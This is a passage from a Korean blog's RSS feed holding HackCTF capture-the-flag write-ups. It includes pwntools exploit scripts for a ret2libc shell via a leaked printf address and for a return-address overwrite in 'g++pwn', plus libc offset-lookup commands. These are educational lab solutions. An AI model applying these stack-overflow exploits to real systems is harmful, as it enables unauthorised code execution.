data-origin-height=&quot;374&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;check_passcode 함수&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;check_passcode 함수에서 반복문을 보면 총 5번을 돌기 때문에 0xC0D9B0A7/5 해서 나눈 값을 5번 보내서 값을 맞춰줘도 되지만, 저는 처음에 0xC0D9B0A7를 보내고 이후에 null을 16바이트 보내서 hashcode와 같은 값으로 맞춰줬다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이제 core 함수에서 알려주는 printf 심볼 주소를 활용해서 system 함수의 주소와 /bin/sh 문자열의 주소를 구해서 exploit 하면 될 것이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1631113071597&quot; class=&quot;shell&quot; data-ke-language=&quot;shell&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;nm -D ./libc.so.6 | grep &quot;system&quot;
strings -tx ./libc.so.6 | grep &quot;/bin/sh&quot;&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위 명령어를 사용하여 system 함수와 /bin/sh 문자열의 오프셋을 구하여 exploit 코드를 작성했다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1631112928100&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from pwn import *
context.log_level='DEBUG'

p = remote('ctf.j0n9hyun.xyz', 3015)

printf_offset = 0x49020
system_offset = 0x3a940
binsh_offset = 0x15902b

payload2 = ''
payload2 += p32(0xc0d9b0a7)
payload2 += p32(0)
payload2 += p32(0)
payload2 += p32(0)
payload2 += p32(0)

p.recvuntil('Passcode:')

p.sendline(payload2)

p.recvuntil(' 0x')
printf = '0x' + p.recv(8)
printf = int(printf, 16)

libc_base = printf - printf_offset
system = libc_base + system_offset
binsh = libc_base + binsh_offset

payload = ''
payload += 'A' * 0x3e
payload += 'A' * 4
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)

p.sendline(payload)

p.interactive()&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위 exploit 코드를 사용하여 성공적으로 flag 값을 확인할 수 있었다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1208&quot; data-origin-height=&quot;736&quot; width=&quot;625&quot; height=&quot;381&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Dgchr/btreydRXYCQ/TCo1reDqvU2KvxSFzOQtNK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Dgchr/btreydRXYCQ/TCo1reDqvU2KvxSFzOQtNK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Dgchr/btreydRXYCQ/TCo1reDqvU2KvxSFzOQtNK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FDgchr%2FbtreydRXYCQ%2FTCo1reDqvU2KvxSFzOQtNK%2Fimg.png&quot; data-origin-width=&quot;1208&quot; data-origin-height=&quot;736&quot; width=&quot;625&quot; height=&quot;381&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;3. 후기&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이 문제를 푸는데 생각보다 오래 걸렸다. 풀고나니 쉬운 문제였지만, 아직도 메모리에대한 부분에서 기초가 탄탄하지 않아서 hashcode 맞춰주는 if문을 통과하는데 많은 시간을 허비했다. 물론 집중을 잘 했으면 금방 풀었겠지만, 최근에 공부에 집중을 제대로 하지 못한 것 같다. 앞으로 더 열심히 공부를 해야겠다.&lt;/p&gt;</description>
      <category>hackctf</category>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/21</guid>
      <comments>https://zzasgi.tistory.com/21#entry21comment</comments>
      <pubDate>Wed, 8 Sep 2021 23:32:48 +0900</pubDate>
    </item>
    <item>
      <title>[hackctf] g++pwn 풀이</title>
      <link>https://zzasgi.tistory.com/19</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;1. 문제&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1120&quot; data-origin-height=&quot;320&quot; width=&quot;622&quot; height=&quot;178&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cJscLc/btrbVn5Ke7U/d5n8LAJBTrqyPeAUWY8r71/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cJscLc/btrbVn5Ke7U/d5n8LAJBTrqyPeAUWY8r71/img.png&quot; data-alt=&quot;보호기법&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cJscLc/btrbVn5Ke7U/d5n8LAJBTrqyPeAUWY8r71/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcJscLc%2FbtrbVn5Ke7U%2Fd5n8LAJBTrqyPeAUWY8r71%2Fimg.png&quot; data-origin-width=&quot;1120&quot; data-origin-height=&quot;320&quot; width=&quot;622&quot; height=&quot;178&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;보호기법&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;보호기법은 NX bit가 걸려있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1180&quot; data-origin-height=&quot;212&quot; width=&quot;738&quot; height=&quot;133&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dsLv9Z/btrbVndAVjF/Cw2ee4GLnrfuN7lGaXaBbk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dsLv9Z/btrbVndAVjF/Cw2ee4GLnrfuN7lGaXaBbk/img.png&quot; data-alt=&quot;main 코드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dsLv9Z/btrbVndAVjF/Cw2ee4GLnrfuN7lGaXaBbk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdsLv9Z%2FbtrbVndAVjF%2FCw2ee4GLnrfuN7lGaXaBbk%2Fimg.png&quot; data-origin-width=&quot;1180&quot; data-origin-height=&quot;212&quot; width=&quot;738&quot; height=&quot;133&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;main 코드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;코드를 확인해보니 main함수에서는 vuln() 함수를 호출하고 끝난다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1294&quot; data-origin-height=&quot;1050&quot; width=&quot;650&quot; height=&quot;528&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/XJXpT/btrbW118M91/UkK2MkptyLoBhHBuYblqdk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/XJXpT/btrbW118M91/UkK2MkptyLoBhHBuYblqdk/img.png&quot; data-alt=&quot;vuln 함수 코드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/XJXpT/btrbW118M91/UkK2MkptyLoBhHBuYblqdk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FXJXpT%2FbtrbW118M91%2FUkK2MkptyLoBhHBuYblqdk%2Fimg.png&quot; data-origin-width=&quot;1294&quot; data-origin-height=&quot;1050&quot; width=&quot;650&quot; height=&quot;528&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;vuln 함수 코드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;vuln 함수 코드를 확인해보니 fgets 함수를 사용하여 사용자로부터 입력 받은 값을 s에 넣어주고 이를 input에 넣어준다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이후 replace 함수를 호출하고 마지막에 strcpy 함수를 사용해 v0를 s로 복사한 후 printf로 출력해준 뒤 종료한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1628769249979&quot; class=&quot;c++ arduino&quot; data-ke-language=&quot;c++&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;std::string *__stdcall replace(std::string *a1, std::string *a2, std::string *a3)
{
  int v4; // [esp+Ch] [ebp-4Ch]
  char v5[4]; // [esp+10h] [ebp-48h] BYREF
  char v6[7]; // [esp+14h] [ebp-44h] BYREF
  char v7; // [esp+1Bh] [ebp-3Dh] BYREF
  int v8; // [esp+1Ch] [ebp-3Ch]
  char v9[4]; // [esp+20h] [ebp-38h] BYREF
  int v10; // [esp+24h] [ebp-34h] BYREF
  int v11; // [esp+28h] [ebp-30h] BYREF
  char v12; // [esp+2Fh] [ebp-29h] BYREF
  int v13[2]; // [esp+30h] [ebp-28h] BYREF
  char v14[4]; // [esp+38h] [ebp-20h] BYREF
  int v15; // [esp+3Ch] [ebp-1Ch]
  char v16[4]; // [esp+40h] [ebp-18h] BYREF
  int v17; // [esp+44h] [ebp-14h] BYREF
  char v18[4]; // [esp+48h] [ebp-10h] BYREF
  char v19[8]; // [esp+4Ch] [ebp-Ch] BYREF

  while ( std::string::find(a2, a3, 0) != -1 )
  {
    std::allocator&amp;lt;char&amp;gt;::allocator(&amp;amp;v7);
    v8 = std::string::find(a2, a3, 0);
    std::string::begin((std::string *)v9);
    __gnu_cxx::__normal_iterator&amp;lt;char *,std::string&amp;gt;::operator+(&amp;amp;v10);
    std::string::begin((std::string *)&amp;amp;v11);
    std::string::string&amp;lt;__gnu_cxx::__normal_iterator&amp;lt;char *,std::string&amp;gt;&amp;gt;(v6, v11, v10, &amp;amp;v7);
    std::allocator&amp;lt;char&amp;gt;::~allocator(&amp;amp;v7);
    std::allocator&amp;lt;char&amp;gt;::allocator(&amp;amp;v12);
    std::string::end((std::string *)v13);
    v13[1] = std::string::length(a3);
    v15 = std::string::find(a2, a3, 0);
    std::string::begin((std::string *)v16);
    __gnu_cxx::__normal_iterator&amp;lt;char *,std::string&amp;gt;::operator+(v14);
    __gnu_cxx::__normal_iterator&amp;lt;char *,std::string&amp;gt;::operator+(&amp;amp;v17);
    std::string::string&amp;lt;__gnu_cxx::__normal_iterator&amp;lt;char *,std::string&amp;gt;&amp;gt;(v5, v17, v13[0], &amp;amp;v12);
    std::allocator&amp;lt;char&amp;gt;::~allocator(&amp;amp;v12);
    std::operator+&amp;lt;char&amp;gt;((std::string *)v19);
    std::operator+&amp;lt;char&amp;gt;((std::string *)v18);
    std::string::operator=(a2, v18, v5, v4);
    std::string::~string(v18);
    std::string::~string(v19);
    std::string::~string(v5);
    std::string::~string(v6);
  }
  std::string::string(a1, a2);
  return a1;
}&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;위는 replace 함수의 코드이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;2.&amp;nbsp; 풀이&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;2294&quot; data-origin-height=&quot;152&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ywWRP/btrbV0Jd6Ql/D16Ro5hqOXf10EkgYG9KRK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ywWRP/btrbV0Jd6Ql/D16Ro5hqOXf10EkgYG9KRK/img.png&quot; data-alt=&quot;gpwn 실행&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ywWRP/btrbV0Jd6Ql/D16Ro5hqOXf10EkgYG9KRK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FywWRP%2FbtrbV0Jd6Ql%2FD16Ro5hqOXf10EkgYG9KRK%2Fimg.png&quot; data-origin-width=&quot;2294&quot; data-origin-height=&quot;152&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;gpwn 실행&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문자를 아무리 길게 입력해도 fgets로 입력받기 때문에 정해진 길이 만큼만 입력되어 출력이 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1808&quot; data-origin-height=&quot;1688&quot; width=&quot;710&quot; height=&quot;663&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/NJVGb/btrbYtqCLWO/YdqE3HS8UkPHpBk3AiTnRk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/NJVGb/btrbYtqCLWO/YdqE3HS8UkPHpBk3AiTnRk/img.png&quot; data-alt=&quot;breakpoint replace&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/NJVGb/btrbYtqCLWO/YdqE3HS8UkPHpBk3AiTnRk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNJVGb%2FbtrbYtqCLWO%2FYdqE3HS8UkPHpBk3AiTnRk%2Fimg.png&quot; data-origin-width=&quot;1808&quot; data-origin-height=&quot;1688&quot; width=&quot;710&quot; height=&quot;663&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;breakpoint replace&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;replace 함수를 실행해주는 지점에 breakpoint 걸고 확인해보니 첫 번째 인자에는 어떤 주소가 들어있고, 두 번째 인자는 사용자가 입력한 문자열이다. 그리고 세 번째에는 문자열 I, 네 번째에는 문자열 you가 들어있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;92&quot; width=&quot;442&quot; height=&quot;77&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdLP9E/btrbW3lm31f/2u5GgID9OqT9lACca1HUl1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdLP9E/btrbW3lm31f/2u5GgID9OqT9lACca1HUl1/img.png&quot; data-alt=&quot;첫 번째 인자&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdLP9E/btrbW3lm31f/2u5GgID9OqT9lACca1HUl1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbdLP9E%2FbtrbW3lm31f%2F2u5GgID9OqT9lACca1HUl1%2Fimg.png&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;92&quot; width=&quot;442&quot; height=&quot;77&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;첫 번째 인자&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실행 결과를 확인해보니 첫 번째 인자에 사용자가 입력한 문자열의 주소가 들어간다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1752&quot; data-origin-height=&quot;1046&quot; width=&quot;696&quot; height=&quot;415&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kFQt2/btrbUXlRIxE/azUdOTEMOsT8UAv16HKjZk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kFQt2/btrbUXlRIxE/azUdOTEMOsT8UAv16HKjZk/img.png&quot; data-alt=&quot;replace 함수&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kFQt2/btrbUXlRIxE/azUdOTEMOsT8UAv16HKjZk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkFQt2%2FbtrbUXlRIxE%2FazUdOTEMOsT8UAv16HKjZk%2Fimg.png&quot; data-origin-width=&quot;1752&quot; data-origin-height=&quot;1046&quot; width=&quot;696&quot; height=&quot;415&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;replace 함수&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;replace 함수 코드를 확인해보니 사용자가 입력한 문자열에 replace 함수에 세 번째 인자로 들어간 I 문자열이 없을 때까지 while문을 계속 돌게된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1618&quot; data-origin-height=&quot;620&quot; width=&quot;719&quot; height=&quot;276&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/VIDkn/btrb1qmiYRz/gPuokfgbsBDWqOlMq5V5u0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/VIDkn/btrb1qmiYRz/gPuokfgbsBDWqOlMq5V5u0/img.png&quot; data-alt=&quot;replace 실행 전&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/VIDkn/btrb1qmiYRz/gPuokfgbsBDWqOlMq5V5u0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FVIDkn%2Fbtrb1qmiYRz%2FgPuokfgbsBDWqOlMq5V5u0%2Fimg.png&quot; data-origin-width=&quot;1618&quot; data-origin-height=&quot;620&quot; width=&quot;719&quot; height=&quot;276&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;replace 실행 전&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1986&quot; data-origin-height=&quot;816&quot; width=&quot;716&quot; height=&quot;294&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b7qXCT/btrbYuJPdbp/JSbkthPo7Op90jmAzcJBwK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b7qXCT/btrbYuJPdbp/JSbkthPo7Op90jmAzcJBwK/img.png&quot; data-alt=&quot;replace 실행 후&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b7qXCT/btrbYuJPdbp/JSbkthPo7Op90jmAzcJBwK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb7qXCT%2FbtrbYuJPdbp%2FJSbkthPo7Op90jmAzcJBwK%2Fimg.png&quot; data-origin-width=&quot;1986&quot; data-origin-height=&quot;816&quot; width=&quot;716&quot; height=&quot;294&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;replace 실행 후&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;I 문자열을 입력한 후 replace 함수를 실행해보니 'I'가 'you'로 바뀐 것을 확인할 수 있었다. 이를 활용하여 return address를 덮어서 exploit을 하면 될 것으로 보인다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1728&quot; data-origin-height=&quot;1594&quot; width=&quot;737&quot; height=&quot;680&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bKtj1H/btrb22SQVT9/JghTLwoDMSYEGi5XgY92M0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bKtj1H/btrb22SQVT9/JghTLwoDMSYEGi5XgY92M0/img.png&quot; data-alt=&quot;strcpy breakpoint&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bKtj1H/btrb22SQVT9/JghTLwoDMSYEGi5XgY92M0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbKtj1H%2Fbtrb22SQVT9%2FJghTLwoDMSYEGi5XgY92M0%2Fimg.png&quot; data-origin-width=&quot;1728&quot; data-origin-height=&quot;1594&quot; width=&quot;737&quot; height=&quot;680&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;strcpy breakpoint&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;strcpy 함수에 breakpoint 를 걸고 확인해보면 replace 함수를 통해 바뀐 문자열이 ebp - 0x3c에 들어가는 것을 알 수 있습니다. 'I' 를 보내면 'you' 로 바뀌게되는 점을 이용하여 return address를 덮을 수 있을 것으로 보입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;Exploit code&lt;/h4&gt;
&lt;pre id=&quot;code_1628771482446&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from pwn import *
context.log_level='DEBUG'

p = remote('ctf.j0n9hyun.xyz', 3011)
#p = process('./gpwn')
#gdb.attach(p)

payload = ''
payload += 'I' * 21
payload += 'A'
payload += p32(0x08048f0d) #get_flag 주소


#p.recvuntil('Tell me something about yourself:')

p.sendline(payload)

p.interactive()&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위 Exploit 코드를 사용해서 성공적으로 플래그 값을 획득할 수 있었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;3.&amp;nbsp; 몰랐던 내용&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ida로 디컴파일되는 c++ 코드가 함수의 인자도 이상하고 너무 복잡해서 동적 디버깅을 통해서 문제를 풀 수 있었다. c++ ida 코드를 더 많이 봐서 익숙해져야 할 것 같다. 그리고 코드 이해가 안될때는 동적 디버깅을 통해서 문제를 풀어나가면 된다는 점을 다시 깨닫게 되었다.&lt;/p&gt;</description>
      <category>hackctf</category>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/19</guid>
      <comments>https://zzasgi.tistory.com/19#entry19comment</comments>
      <pubDate>Thu, 12 Aug 2021 21:34:04 +0900</pubDate>
    </item>
    <item>
      <title>[hackctf] rtl_world</title>
      <link>https://zzasgi.tistory.com/18</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;1320&quot; data-origin-height=&quot;328&quot; data-ke-mobilestyle=&quot;widthOrigin&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wCDOS/btrbyHDnY1M/65V7Mm2TZ7ok2ypxkkr7ik/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wCDOS/btrbyHDnY1M/65V7Mm2TZ7ok2ypxkkr7ik/img.png&quot; data-alt=&quot;checksec 결과&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wCDOS/btrbyHDnY1M/65V7Mm2TZ7ok2ypxkkr7ik/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwCDOS%2FbtrbyHDnY1M%2F65V7Mm2TZ7ok2ypxkkr7ik%2Fimg.png&quot; data-origin-width=&quot;1320&quot; data-origin-height=&quot;328&quot; data-ke-mobilestyle=&quot;widthOrigin&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;checksec 결과&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제 파일에는 nx bit 보호기법이 걸려 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1628507775543&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax
  int v4; // [esp+10h] [ebp-90h]
  char buf; // [esp+14h] [ebp-8Ch]
  void *v6; // [esp+94h] [ebp-Ch]
